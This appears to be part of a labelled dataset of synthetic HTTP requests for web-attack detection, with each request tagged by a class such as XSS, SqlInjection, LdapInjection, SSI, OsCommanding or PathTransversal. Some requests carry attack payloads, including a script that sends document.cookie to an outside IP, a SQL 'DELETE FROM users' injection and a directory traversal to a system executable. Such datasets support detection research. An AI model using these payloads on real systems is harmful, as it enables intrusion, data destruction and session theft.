Referer: http://www.eitihajD.gov/tIn5en3l/nlsrpB/agckteSl/ihgsz/oA3taa.bin
TE: trailers,trailers,gzip;q=0.8
Trailer: Expect
User-Agent: splieamyznittdgln
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9140x4441
Via: 9.2 www.anaal.css, 5.5 www.iokse.shtml
Transfer-Encoding: identity
Upgrade: Nqj9e/1.6
Warning: 096 28.130.214.30:40463 "bwtv1" "Wed, 03 May 06 17:00:25 UTC"
X-Forwarded-For: 148.0.118.253
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41210
Start - Id: 44001
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.0
Host: 30.80.9.164:80
Connection: chitDi3
Accept: image/*;q=0.8, image/*;q=0.7
Accept-Charset: koi8;q=0.6, macintosh, windows-1254;q=0.4, big5;q=0.4, x-mac-arabic;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 89.252.55.156
Cookie: 1ewlrje=8ibbtftpayvsin t
Cookie2: $Version="691"
Date: Sun, 04 Sep 05 04:13:59 UTC
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Thu, 19 Jan 06 07:19:51 GMT
If-Unmodified-Since: Sun, 31 Oct 04 13:16:19 GMT
If-Match: "E@teygm54glXv28"
If-None-Match: *
If-Range: Sun, 03 Jul 05 15:52:00 CET
Max-Forwards: 3081
MIME-Version: 9.9
Pragma: 9=tyhewA
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Basic aW1lT2U6aWdzbm51a2g=
Range: 201-
Referer: http://deaeiv2.ch/atezu/xtyoos/pmnd/tioflfr.tiff
TE: trailers,deflate;q=0.3
Trailer: Host
User-Agent: 1BTQuiz http://www.4tmL8.gov
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5667x180
Via: dtee/6.1 57.199.108.21, FTP/8.6 www.rRsloae.png:18922, engh/7.1 www.42spe.tiff
Transfer-Encoding: gzip
Upgrade: tIrc/4.2
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44001
Start - Id: 38169
class: LdapInjection
GET /iolhs85edfyga0/cmer/KlhYlibZoQOKboot.ini7/eea/eOe8CaTKjXHCI0/ar1oieajareehaoytu/sSajaeeKebho4edea/l.5MrFd/2mg/elbeoteelri/uNGlsx/a8citrn.asp?uasyih3a=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&8BLa9mcechojU5=8&pQpositionXB=vtiE&1ac7tmP=cpQiIW9Kj&4EbgxTDenTcmd=suxQZ7492ZnI HTTP/1.0
Host: www.iqNlhcltC4.be
Connection: close
Accept: image/*, image/*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 122.205.56.130
Cookie: 5sisi=ehb0;anxntirNuoh=3961008128;5-ycosaccess_logG1T4=rq r~;AcLztn1aghhgpde=mnheanwYnehYutw;hhdy6te=sz0@J3FXlju3;Ttn=rmornrmo
Cookie2: $Version="5"
Date: Wed, 30 Dec 09 24:49:15 CET
ETag: W/"I4g._rkzJPtJSclIRTr"
Expect: itgdtcl=icezz
From: b63ter3o@6adqse.net
If-Modified-Since: Fri, 09 Nov 07 06:09:34 GMT
If-Unmodified-Since: Tue, 16 May 06 10:59:16 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 06 Feb 05 23:31:37 GMT
Max-Forwards: 6
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic Z3JzYXNlMDplb2hzNWtxZA==
Authorization: Digest response="FccE9222AAefC7fBdF4E41fc40E562cd"
Range: -58269,-622
Referer: http://myef.ch/Dsalorrk/ttmcR.php4
TE: deflate
Trailer: Via
User-Agent: Mozilla/3.7 (compatible; MSIE 2.1; Solaris; anaw; pu7orra; tsnrnnfssd)
UA-CPU: PowerPC
UA-Disp: 776,149,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 411x727
Via: 5.8 17.83.235.142, 3.2 117.87.41.173, FTP/1.8 174.112.172.23
Transfer-Encoding: sctr
Upgrade: nume/0.6, Uma/7.3
Warning: 607 www.RgHm.tiff "solih9ny" 
X-Forwarded-For: 105.91.132.113
X-Serial-Number: 276586158043
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38169
Start - Id: 37232
class: LdapInjection
GET /mEqbWQsAQ.5fZ.Dq0G/ixrGCmsBPSp/ePBx/9ltsegtoo/rsasdtkmhetpocdsmj/rWMcM.png?7mJocd=mvTIv_Y&nme9nuei=17472189&fgexe=e-&mCedaeht9sh=%29+%28+++%7C%28uo9E%3DePudt*%29&3ndtg8Ulfo5d1=6&hpichbrrh2=ebZ-QZ-Gr&tlptf=+A+pl&kobKEXselect_=execgp HTTP/1.0
Host: 58.31.98.170:80
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.1
Accept-Encoding: identity;q=0.8, gzip;q=0.1, deflate;q=0.2
Accept-Language: n-eafeaean, oa2ekt-i9SEu7, gmet-t1iEee
Cache-Control: min-fresh=8
Client-ip: 164.10.58.80
Cookie: frecxIml=$g 6;nyo=uls1n;ehoa ai ;fO=saTto>~\;tqgt8nAsdgrn=87;NWd=ehj/&;8IQw=umasT2tcr )h
Cookie2: $Version="79"
Date: Sun, 10 May 09 16:51:09 CET
ETag: "rKD45QAQMDqkQ1Av8"
Expect: xg5edee=apam;5hda
From: 87ho@Inuowxs.net
If-Modified-Since: Sat, 11 Oct 08 08:53:22 CET
If-Unmodified-Since: Wed, 03 Nov 04 15:46:55 CET
If-Match: "co8n4J2dQV3nvJhikI"
If-None-Match: *
If-Range: Thu, 20 Aug 09 20:40:51 CET
Max-Forwards: 1990
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: vghc tzcn=txlrsuw
Range: -035
Referer: http://www.t7fml8.fr/seuNo/HnEop.php3
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.4 (Machintosh; U; PPC Mac OS X 5.7; sk-vy; rv:7.3.2) Gecko/71060049
UA-CPU: x86
UA-Disp: 836,441,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0327x020
Via: 3.6 www.tsoxn.jpeg
Transfer-Encoding: deflate
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 444 71.101.94.149:869 "e5eslcsyoIxfqbnaAe" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37232
Start - Id: 39448
class: SSI
GET /aoadda/sn/u0oYz/tr8kgEzE1efyitbaiia/citeuciiytl/Mta/aUX2Yd_CuGZCrgYOASn/d@Lxmlh7URZcWK/bnn8IEecMe7hl0ocbs/uIkL9-WwON0-4/9p.png?jiho9hTN2etd7Q=99&xfobgsound8pZmbetweenH=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&Shthed2=drluFoipqy+&oudncUt=s&ehet5b0a=9og1e9tce0&aKRW2kAboot.ini=irtgtiduhlDoitNnn&rdr=0097795920&rsn1aabnepusw9h=tJnA_m&w8n0q=30153823&o5eirtUsyBy9x=li&xvarw-Wiwp-XcQf=oL7&adr=aiqwosxdmeaed2o&DMOsprocessing-instructionG=410&raefimoeaht=Kub%3Fsth HTTP/1.1
Host: 81.92.101.57
Connection: 0srna
Accept: */*
Accept-Charset: cp-950;q=0.9, big5;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 179.178.240.191
Cookie: unoEblouhsns=W-tphpz;rrl=9eexnaw
Cookie2: $Version="52"
Date: Mon, 27 Sep 04 08:34:30 UTC
ETag: "4RA_nX6hXk.ECNzh8"
Expect: 100-continue
From: alitInca@hE8o0.it
If-Modified-Since: Wed, 09 Aug 06 09:05:52 CET
If-Unmodified-Since: Tue, 02 Oct 07 22:55:07 GMT
If-Match: *
If-None-Match: "ez4kgak4gfDr-36P"
If-Range: Sat, 11 Apr 09 11:39:49 GMT
Max-Forwards: 94
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: rashN riiam=cssstki
Authorization: NTLM TmVwQXgzaml0ZWI4dDdndDJldHNvM291bmVnclR2dDVoMg==
Range: 993-
Referer: http://www.lr9ere.uk/ptsi/tnfd/irnlhN.html
TE: chunked,gzip;q=0.5
Trailer: Warning
User-Agent: Mozilla/8.2 (Windows; U; Windows NT 9.6; iq-xe; rv:1.2.3) Gecko/49713505
UA-CPU: Sparc
UA-Disp: 677,8714,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x2523
Via: 2.8 www.nuda.jpg:515, 9.8 250.246.187.167:3, 4.7 www.ud4i5hi.jpeg
Transfer-Encoding: rdrdd
Upgrade: nSr/8.2, bkiiH/4.4, thru4/6.0
Warning: 799 37.15.16.235:0423 "eauhqipdaedde" "Thu, 30 Aug 07 24:57:07 CET"
X-Forwarded-For: 38.112.178.33
X-Serial-Number: 298841177786
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39448
Start - Id: 48213
class: XSS
POST /r.e-v/7ZjF/dw/fmf_ly-OCyA2@/@gk@zrCuNOwBSi5/rVX/o7vgD3.jpg? HTTP/1.1
Content-Length: 182
Content-Language: 34,nsleQae
Content-Encoding: deflate
Content-Location: /oEuie.png
Content-MD5: YW1laGRzcm5yc1FjNG50bw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 May 04 13:04:56 GMT
Last-Modified: Thu, 01 Nov 07 04:37:29 UTC
Host: www.cdelwqt.com:977
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: <div style   ="   behaviour: url([http://www.eran.com/script/nhktyu.pl]);   " >
Accept-Language: ecesmi-c, ssiedl-AHvt;q=0.2, zidhx-0Jius, 0-daggw, Nf6tleaa-hIu
Cache-Control: no-transform
Client-ip: 188.123.167.43
Cookie: Amnolo=51792;oTce=hupbh;snm6hdod=t0p0V
Cookie2: $Version="5"
Date: Mon, 30 Aug 04 23:06:55 UTC
ETag: W/"JkNm7sD6l4qVMEyYQ5ri"
Expect: 100-continue
From: kTOsae7a@Lnatniube.cz
If-Modified-Since: Thu, 21 Dec 06 24:17:40 UTC
If-Unmodified-Since: Wed, 09 Jan 08 05:32:27 GMT
If-Match: "jB6oZq4koAZ1Qpm"
If-None-Match: *
If-Range: *
Max-Forwards: 654
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ccntio"
Authorization: Digest realm
Range: 9-78819
Referer: http://www.mdaymozl.net/s9a4m/anld.mp3
TE: deflate;q=0.0,trailers
Trailer: Accept-Encoding
User-Agent: <script   >alert    (rlsgSnm4hetsra.mteih)</script  >
UA-Disp: 5215,325,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 179x443
Via: uxepur/2.7 www.7rEuhtio.shtml, 3.7 78.207.58.214, 5.5 250.105.124.100
Transfer-Encoding: deflate
Warning: 878 www.r5rehang.gif "hcioniot2im682agn" "Thu, 10 Nov 05 20:56:18 CET"
X-Forwarded-For: 16.22.84.83
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Odihe4s=45518610&5mp=e&rhte69yeiqntn=0uP&DuMqfxMWUTN=tn1sefs5rfr4t&234vyd5=2eXF5&eu8fRce=7&petTtoiht1=RqoSyn&epnbdo4tewawB=same)nullbnHsn&8okq=94819&Iiyrt=st7]o&eans=Eo4ostaY1jeo

End - Id: 48213
Start - Id: 45207
class: PathTransversal
GET ////? HTTP/1.1
Host: www.9arMefe.net:152
Connection: gqan
Accept: application/x-tar;q=0.4, image/jpeg;q=0.2, video/mpeg;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.8
Accept-Language: *
Cache-Control: max-age=8383
Client-ip: 125.250.245.160
Cookie: A@fA=gy;bb1=]nbte(2/objectT=e:thh
Cookie2: $Version="6"
Date: Sun, 14 Dec 08 04:21:01 GMT
ETag: W/"Xmo5m4bH7_.musI"
Expect: oq0ewer7
From: nhste@jp1ihu.be
If-Modified-Since: Sun, 24 May 09 02:51:37 CET
If-Unmodified-Since: Fri, 15 Aug 08 13:27:35 CET
If-Match: *
If-None-Match: "ql1LzEgDmoYabfZ.U"
If-Range: Sun, 15 Feb 09 18:41:00 CET
Max-Forwards: 28
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: NTLM dG56RWllc2hvczZub05hbzhhaXNwcjd0YWV5bmk3b2xy
Range: 706278-,584316-,-67
Referer: http://p3Yh.org/aEngEocj/0ntTym/oEyhh2pl/khh54g/Twueao.gz
TE: trailers,chunked;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/2.3 (X11; U; SunOS sun4u 7.1; ii-cj; rv:5.0.2) Gecko/64360717
UA-CPU: Sparc
UA-Disp: 749,556,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0142x8254
Via: FTP/1.0 www.nesDsdad.js:89, FTP/4.6 36.194.95.194, 4.1 134.5.100.143
Transfer-Encoding: deflate
Upgrade: botOA/6.4, hiei4a/3.6, u8Qat/8.0
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 157.255.96.148
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45207
Start - Id: 37724
class: LdapInjection
PUT /tqtngoyalpdorhi/aIj/nv8VVnwJUVvu-dJ.tiff? HTTP/1.0
Content-Length: 68
Content-Language: Rlr1odr,ee,sAq4tbe
Content-Encoding: compress
Content-Location: /e2oot/osMetnos/eseoa.swf
Content-MD5: c05lZWxicnJnMU5iaXNocQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 09 Apr 07 01:01:44 GMT
Host: 24.110.241.39:167
Connection: 2sfe
Accept: image/png, audio/x-wav;q=0.3
Accept-Charset: iso-8859-7
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=5093
Cookie2: $Version="6"
Date: Sun, 20 Dec 09 02:43:48 CET
ETag: "EE7jfrHrbXi6UkKv"
Expect: 8mpesG7
If-Modified-Since: Wed, 08 Dec 04 01:45:10 UTC
If-Unmodified-Since: Fri, 03 Jun 05 17:23:58 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 9501
Pragma: 1rotl=arTU
Authorization: Basic bmUzdjp0b3VFcnI=
Referer: /rf7NlnE/esq1cjn/0yio.asp
TE: trailers,trailers
User-Agent: Mozilla/5.2 (X11; U; Open BSD i386 3.7; eo-eE; rv:6.8.6) Gecko/25569704
UA-Pixels: 6282x273
Via: FTP/5.1 137.160.212.178, FTP/2.2 www.a6taei3d.jpg
Transfer-Encoding: hEjcm; MeyrA=8sno
Upgrade: lnd/9.2, toL/2.4
----: ------------------------------------------------

yuecEerjm4=yaccept&wbCn=eya2l)(&(objectClass   =    aa*)

End - Id: 37724
Start - Id: 47806
class: XSS
GET /gtLsZ@c0-L/g4CpMZOFYJMLkZWLRzd4/lz/.y9P-zCZ/t.4FLx_QVtL/-fOG07frK5I./rCVclvqJq/5O@67sDxpswhere7R/eeamrrtp4qn/yhtacces0t.O3/hSfPs9n7/lILoCtlpvyoleiege.jpg?U9wm45qyTH4=%5B%5CxC0%5D%5B%5CxBC%5Dscript++%3E%5Bwindow.open%28%27http%3A%2F%2F120.242.9.141%2Ftaen.asp%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript%3E HTTP/1.0
Host: www.1najbl.be
Connection: uAE6xhbo
Accept: */*
Accept-Charset: utf-8, isiri-3342;q=0.6
Accept-Encoding: 
Accept-Language: ty0seo-oN, mrexty-gcnasn;q=0.8, PysoItA-sgh, s45nrg-pxWm
Cache-Control: no-cache
Client-ip: 203.27.77.55
Cookie: bioe0stk=6148;sed4aefS8=fC7LlV@58;5kse=hr2ec17Uk5d4;5dn9ntIitrsoe=c
Cookie2: $Version="20"
Date: Sun, 11 Mar 07 24:06:11 CET
ETag: W/"V4Cx.0dO4PHMg0-TQkRy"
Expect: qtAne=tljcjt;logaa0ht=gnpe
From: shnba@roottg.it
If-Modified-Since: Tue, 24 Jun 08 20:35:08 UTC
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Aug 06 13:15:01 CET
Max-Forwards: 6659
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: Digest response="fAFCD53CC2db8890e378ecEecF1Ea57b"
Range: 2820-37,-5180,81-
Referer: http://www.cndtm.be/pjofmeh/ruycoe.php4
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/5.2 (Machintosh; U; PPC 0.0; tl-O0; rv:8.5.0) Gecko/71796019
UA-CPU: MIPS
UA-Disp: 191,879,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5941x524
Via: HTTP/0.5 7.11.105.199, 3.3 247.22.173.87
Transfer-Encoding: gzip
Upgrade: thgmp/3.3, cwanec/6.4
Warning: 315 223.24.177.34 "gnbpnesajImnUauppEa" "Thu, 03 Jun 04 13:41:49 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 14491
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47806
Start - Id: 42518
class: SqlInjection
GET /9fretsaiirreooda03/d_o_iLEtMPjh/VBCWKATI/o0@ME0mbXPVva/70_8ONx/T1s/alu.PJPlU/mzOo0BaoOglbdMqGc7kE/ibssasE5oczRScno/NBuCFwd0kz_Co/a1IoeHfnne.mspx?d7IbNblonCrr=G%26Ttetgnte8nph-&ueYyr=OR++97584%3E41220509957 HTTP/1.1
Host: 123.8.147.141
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate, identity
Accept-Language: *
Cache-Control: max-age=37
Client-ip: 17.1.105.246
Cookie: nhtstaiEtrsalai=sWDx;rylepeena0wt=2034;Ghortbs=e2R
Cookie2: $Version="7"
Date: Thu, 08 Jan 04 21:33:45 UTC
ETag: "QTJNs90GRqYP0w9uxk2"
Expect: 100-continue
From: be38Ged@6e9snto.ch
If-Modified-Since: Mon, 14 Jul 08 20:11:25 GMT
If-Unmodified-Since: Mon, 17 Jan 05 18:03:56 CET
If-Match: "kpzyFdqRlRCIkQUVXBiE"
If-None-Match: "lQZa0mll0TktaLwVKago"
If-Range: Thu, 08 Jul 04 16:07:22 UTC
Max-Forwards: 41
MIME-Version: 6.0
Pragma: 5b=lEen
Proxy-Authorization: ruen alnttzjd=aollyO
Authorization: Basic b0JPZXRlbzp0ZWllc2l0
Range: 430-,2-8084
Referer: /Hiuhh/eaee/hooeele.bin
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: 9y8eQ-KRYp http://www.osWt.gov
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 2.5 89.61.78.188
Transfer-Encoding: identity
Upgrade: iiruhh/4.7, Tnar/9.2, osto/3.0, ouuar/8.2
Warning: 860 252.84.118.119 "gymdt4aeaea4ehhX" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 68264538863472
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42518
Start - Id: 46589
class: XSS
GET /AlPiKpTK7/OkE_V9bin/KZ0/e4_H/gokZepa9atIdaj4ertih/mU5Yb7z08kO60/md/Q7.BB.insert7netcats8FT/xeogss/xscript/2wtBRH1@bCMt.asmx?sJtecjien=58196&6lrsoy=sYpas&s-tm7O_C=7window.open4%5BftolonologB6eait&adminlikeFU9I5l=kuefdnstt&EtdivRDkZ=1ezaoaeEhuhjggnaha&b2pnakRctQ=sZ8dyBBTz&xszMfeei=n+oja&tsr=006&uhaitc59edeGnd=elKKHGYdvfW HTTP/1.0
Host: 118.142.184.201
Connection: keep-alive
Accept: audio/basic;q=0.1
Accept-Charset: windows-1251, iso-8859-2, iso-8859-15
Accept-Encoding: eputy "    style=left:expression(alert   ("n.s7  "))    alt  ="
Accept-Language: *
Cache-Control: min-fresh=452
Client-ip: 222.227.138.4
Cookie: e5mmoisuo=83
Cookie2: $Version="4"
Date: Sat, 24 Jun 06 01:24:20 GMT
ETag: W/"i_iTdQu4_UB@-BG"
Expect: 100-continue
From: t0epeeaC@htiute.ch
If-Modified-Since: Sun, 16 Apr 06 21:07:55 UTC
If-Unmodified-Since: Wed, 26 Sep 07 06:54:20 UTC
If-Match: "Rsx0uDBbGRsxCdELJF"
If-None-Match: "tz2B.2h-l.9Ly-RL62"
If-Range: Fri, 05 Aug 05 14:31:55 UTC
Max-Forwards: 37
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: so7n seEgteed=c5edme
Authorization: Stuhte Tndser=meskor
Range: -65951,35-456894
Referer: /tornha/tbhy/wozhmear/hrnt/vieegNb.wav
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: stdsELl/7.8.5.6.5
UA-CPU: PowerPC
UA-Disp: 3779,9058,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 5.5 www.erwyaae.jpeg, 3.9 www.seNutos.htm, FTP/1.2 31.154.255.185
Transfer-Encoding: gzip
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 051 74.151.102.193 "tps9iyOEh" 
X-Forwarded-For: 55.134.78.120
X-Serial-Number: 015353495234
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 46589
Start - Id: 41769
class: SqlInjection
GET /tubhehTtIra5Aac.html?childal6ibR46Ip=%27++group+by+++++users.id++having+44396%3D44396&T6TRLpV=+e HTTP/1.0
Host: www.WC6tgse.de:8
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: w=nag
Client-ip: 141.135.3.12
Cookie: 2buSlhoiowjh=8709;EoSgaiesA0ciu=inahiiglsf0s;bunotttN=629;dasnlutea=l9Eugnetcatbgsounds+;YNyf=20890102
Cookie2: $Version="86"
Date: Fri, 23 Apr 04 08:27:33 UTC
ETag: "Ml8sUtHi-YLnzJaoSF"
Expect: osevnd
From: edbsae7@m3iuOei.biz
If-Modified-Since: Thu, 06 Apr 06 12:29:25 CET
If-Unmodified-Since: Mon, 17 Nov 08 03:25:29 GMT
If-Match: *
If-None-Match: "1jcCyg7mmJJYtY2.u-"
If-Range: *
Max-Forwards: 6
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic eFN3ZXlpczp0ZWVybXRi
Authorization: NTLM bDZxZXdoeTV3NmRlYXNtZXNoZXJ1eWRlNmFsZGFodDVsbHR5Yg==
Range: 4234-490888,-164882
Referer: /ykica/tiheaal3/ttgb2b.php4
TE: trailers,trailers,gzip
Trailer: Upgrade
User-Agent: oG_hx4I http://www.nnhsllJs.org
UA-CPU: 68000
UA-Disp: 740,6527,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5624x146
Via: FTP/6.6 80.232.6.242:88, 5.7 www.ltjet.js, 8.0 138.214.11.40
Transfer-Encoding: compress
Upgrade: baE/8.7, 0es9t/8.9, lisu/3.1, ncnHe/5.8, iuj/3.3
Warning: 047 www.s7aieai.js "nisluLPLAsoy" "Fri, 29 Jun 07 15:53:33 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41769
Start - Id: 42396
class: SqlInjection
GET /pkBn2likeGuUORMyopt/vCPNsBXc0B0/mhtltEagaIaekwHanixe/tsEa/s8ee8zhttn8tsfss/l6@Glh40ASxVI9jF/i7QyT1-N@3qeuO0MZr/wn2eoyieromooar.mdb?yQOUUU3=3alew6%28eT&mdatoA8itr=oa&ii=roToEsoota&tHdOjkNEN6=ndk4%27++%29%3B++DELETE++FROM+++users+WHERE+++upper%28username%29++++%3D+upper%28%27admin&h6ie=n0saa+iz&5IcirHbnpr5eDer=hu4QwPbz0z%40o&nenard=0n8th09&einqeehu=88048&vdrpogr=ljadoVUBdG83&a5su=8643905 HTTP/1.0
Host: www.emiewnhe.be
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-8, isiri-3342, ks_c_5601-1987;q=0.9, koi8-r
Accept-Encoding: *;q=0.6
Accept-Language: sonp0-4ol0, sunsk-o8O5, ekosur-iRn2Xdt;q=0.8, tmzkgrn-tt;q=0.2
Cache-Control: no-store
Client-ip: 194.60.3.194
Cookie: enr=fa0te;K_PRqxqs=tr4erjLShh;ienyet9newoh=9tm;iImnYqxtgesh=64901;iNaru2ge4=8;rFttw1s=646
Cookie2: $Version="9"
Date: Tue, 29 Jul 08 09:06:55 CET
ETag: W/"77J0t1p0kMjARPQPi3x"
Expect: aobdyaog
From: aespw@dgaxhlomnn.it
If-Modified-Since: Sun, 28 Jan 07 02:26:27 CET
If-Unmodified-Since: Sat, 13 Mar 04 19:23:44 GMT
If-Match: *
If-None-Match: "s8MqG@JQ9iKzuWDb4I2"
If-Range: "joLoFYDvupL9su_"
Max-Forwards: 60
MIME-Version: 2.5
Pragma: OeoQea=izOe2nr
Proxy-Authorization: 0egwt ei2a=faen96m
Authorization: r1dh9i e8eemggy=tumI
Range: -4,92807-997,-01613
Referer: http://tZE3fas3.fr/tNiYmTw/0ohsencE/stacaia/egztn.mpeg
TE: chunked;q=0.7
Trailer: Host
User-Agent: itemh (e1PNcGqKe)
UA-CPU: StrongARM
UA-Disp: 791,8136,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 1.7 89.22.85.237, HTTP/2.9 93.58.249.206
Transfer-Encoding: cuei
Upgrade: rse/1.1, o5mn/7.6, zlr3/8.8, or7Eaa/3.4
Warning: 630 www.qHomhe.tiff "xvqr" 
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42396
Start - Id: 46097
class: PathTransversal
PUT /eeslanpeibglc/tjeOsuEthratzit/hAcjUt@GW0i48m/lq8itozn3iig8/areybeacahSpt/xmBuGiKbuFMkqH/9TiSntdS/ouhe/ayFrA0@84/pxP7m3xgwQtj1Y0/g.NVpd0UL1mwvppWTp.cgi? HTTP/1.1
Content-Length: 427
Content-Language: m8er,slsuRE
Content-Encoding: deflate
Content-Location: /acoRnha.exe
Content-MD5: ZWU3a2kwbmJMcmhlaGRsbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Oct 09 22:26:43 GMT
Last-Modified: Wed, 25 Jun 08 02:14:13 CET
Host: www.ostiioeob.biz:64
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 245.20.88.13
Cookie: Xtvlsm4J-ST=ttebf4I;uhn1a=tahtaccesh;dibyixlmrtAt=5860;uB8kQ1=280615398;HEs9dnUr7egcpe=Wfltnn
Cookie2: $Version="0"
Date: Fri, 29 Oct 04 23:34:01 CET
ETag: W/"TbF8453pah_RFw4TC"
Expect: 1riwi
If-Modified-Since: Thu, 25 May 06 13:19:06 CET
If-Unmodified-Since: Fri, 23 Oct 09 10:00:17 CET
If-Match: *
If-None-Match: *
If-Range: ".K5SgDfV0JkuNSNbf_g"
Max-Forwards: 175
MIME-Version: 4.9
Pragma: dmeddd='ll'
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: NTLM YXBzZWlhN29nMmVzbWZyaVRvaWxtZUFob3l0SW5zckNuTVRvNnhFc3R0
Range: 43-
Referer: http://www.lErl.cz/ghuooamg/tgnrt.html
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/9.2 (compatible; MSIE 6.8; Unix; wh3vctx5tl; cr7eehxj)
UA-CPU: x86
UA-Disp: 013,8329,8
UA-Color: color32
UA-Pixels: 1090x096
Via: FTP/7.0 www.ag4QOTl.png, 5.5 185.111.24.26, eennh/5.7 185.15.65.49
Transfer-Encoding: compress
Warning: 725 2.115.234.163 "nhM0estysig8nhena" "Sat, 25 Mar 06 01:22:22 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

